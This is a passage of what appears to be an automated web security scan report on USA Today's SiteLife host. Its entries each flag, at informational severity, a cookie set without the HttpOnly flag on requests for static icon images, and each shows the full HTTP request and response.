Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "62f23bf4917acb1:2af"
If-Modified-Since: Tue, 02 Nov 2010 13:29:19 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:13 GMT
Etag: "62f23bf4917acb1:2af"
Connection: close


11.73. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "89039f4917acb1:2af"
If-Modified-Since: Tue, 02 Nov 2010 13:29:19 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:14 GMT
Etag: "89039f4917acb1:2af"
Connection: close


11.74. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "d8a24cf4917acb1:2af"
If-Modified-Since: Tue, 02 Nov 2010 13:29:19 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:13 GMT
Etag: "d8a24cf4917acb1:2af"
Connection: close


11.75. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/throbber.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/throbber.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072
If-None-Match: "8687ae56b7ccb1:2af"
If-Modified-Since: Thu, 04 Nov 2010 22:01:56 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:11 GMT
Etag: "8687ae56b7ccb1:2af"
Connection: close


11.76. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber_circle.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/throbber_circle.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/throbber_circle.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "9fd4e3e46b7ccb1:2af"
If-Modified-Since: Thu, 04 Nov 2010 22:01:55 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:14 GMT
Etag: "9fd4e3e46b7ccb1:2af"
Connection: close


11.77. http://sitelife.usatoday.com/ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "b8e68df3917acb1:2af"
If-Modified-Since: Tue, 02 Nov 2010 13:29:18 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:13 GMT
Etag: "b8e68df3917acb1:2af"
Connection: close


11.78. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/email/pluck-email-icon.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/email/pluck-email-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/email/pluck-email-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 253
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "5eb1bcf4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:55 GMT
Connection: close

GIF89a.............................................................|||zzzxxxuuuqqqooollliiieee```]]].........!.......,..........z`..dY.A.......40.@P.......l#.H$..p.9.&.Ub.K.(..A!.(..J%0(G..."R..,.@..D
...[SNIP]...

11.79. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 211
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "ccb29df4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:57 GMT
Connection: close


11.80. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 391
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "aaecb7f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:59 GMT
Connection: close


11.81. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 106
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "508ab5f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:56 GMT
Connection: close


11.82. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-digg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-digg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-digg.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 137
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "f627b3f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:56 GMT
Connection: close


11.83. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-fb.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-fb.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-fb.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 345
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "aaecb7f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:56 GMT
Connection: close


11.84. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-ff.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-ff.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-ff.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 173
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "aaecb7f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:56 GMT
Connection: close


11.85. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 172
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "aaecb7f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:56 GMT
Connection: close


11.86. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 118
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "f627b3f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:56 GMT
Connection: close


11.87. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 271
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "508ab5f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:57 GMT
Connection: close


11.88. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif

Issue detail

